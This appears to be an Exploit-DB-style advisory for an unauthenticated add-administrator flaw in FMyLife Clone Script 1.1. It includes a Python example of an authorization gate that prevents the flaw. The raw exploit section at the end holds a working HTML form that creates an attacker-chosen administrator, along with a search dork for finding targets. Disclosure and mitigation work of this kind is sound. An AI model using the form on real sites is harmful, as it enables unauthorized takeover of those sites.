Vendor: FMyLife Clone Script (Pro Edition)
By: Ihsan Sencan
CVSS: 7,5 (HIGH)
Add/Edit/Delete/ Category, Admin Vs...
CWE: 264
Product Name: FMyLife Clone Script (Pro Edition)
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: None
CPE: a:alstrasoft:fmylife_clone_script_pro_edition
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017

Add Admin Exploit

FMyLife Clone Script (Pro Edition) version 1.1 allows an attacker to add an administrator. The proof-of-concept form below posts action=add-admin to the script's admin/ path, together with a username and password of the attacker's choice.

Mitigation:

Ensure that the application is properly configured to prevent unauthorized access to administrative functions.
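
An added example, not part of the original advisory or the vendor's code: a minimal server-side gate of the kind the mitigation calls for, written in Python for illustration. The field names action, admin-username and admin-password come from the form on this page; the session layout, the csrf-token field and the in-memory admin set are assumptions.

```python
import hmac
import secrets

ADMIN_ACTIONS = {"add-admin"}  # action value submitted by the form on this page


def new_session(user=None, role=None):
    """Constructed server-side session record (layout is an assumption)."""
    return {"user": user, "role": role, "csrf": secrets.token_hex(16)}


def authorize(session, form):
    """Deny by default: caller must be a logged-in admin with a valid token."""
    if session is None or session.get("role") != "admin":
        return 403, "not an authenticated administrator"
    sent = form.get("csrf-token", "")  # hypothetical anti-forgery field
    if not hmac.compare_digest(sent.encode(), session["csrf"].encode()):
        return 403, "missing or wrong anti-forgery token"
    return 200, "ok"


def handle_admin_post(session, form, admins):
    """Handle a POST to the admin path; `admins` stands in for the user store."""
    status, reason = authorize(session, form)  # runs before any action is read
    if status != 200:
        return status, reason
    if form.get("action") not in ADMIN_ACTIONS:
        return 400, "unknown action"
    name = form.get("admin-username", "").strip()
    if not name or not form.get("admin-password") or name in admins:
        return 422, "invalid or duplicate account data"
    admins.add(name)  # a real store would also save a salted password hash
    return 200, "administrator added"


if __name__ == "__main__":
    admins = {"root"}
    # Constructed request: the page's form fields, sent with no session at all.
    form = {"action": "add-admin", "admin-username": "mallory",
            "admin-password": "example-only"}
    print(handle_admin_post(None, form, admins), sorted(admins))
    admin = new_session("root", "admin")
    form["csrf-token"] = admin["csrf"]
    print(handle_admin_post(admin, form, admins), sorted(admins))
```

The authorization check runs before the action field is read, so a request without an administrator session gets the same 403 whatever it asks for.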

Exploit-DB raw data:

# # # # # 
# Vulnerability: Add Admin Exploit (Add/Edit/Delete/ Category, Admin Vs...)
# Google Dork: FMyLife Clone Script
# Date:10.01.2017
# Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm
# Script Name: FMyLife Clone Script (Pro Edition)
# Script Version: 1.1
# Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/   
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
#Exploit :
<html>
<body>
<h2>Add an Administrator</h2>
<form action="http://localhost/[PATH]/admin/" method="post">
 <div id="add-admin-form">
  <input type="hidden" name="action" value="add-admin" />
  <label for="username">Username:</label>
  <input type="text" id="username" name="admin-username" value="" />
  <div class="spacer"></div>
  <label for="password">Password:</label>
  <input type="password" id="password" name="admin-password" value="" />
  <div class="spacer"></div>
  <input type="image" src="add-administrator.png" name="add-admin" id="add-admin" value="Add Administrator" />
 </div>
</form>
</body>
</html>
# # # # #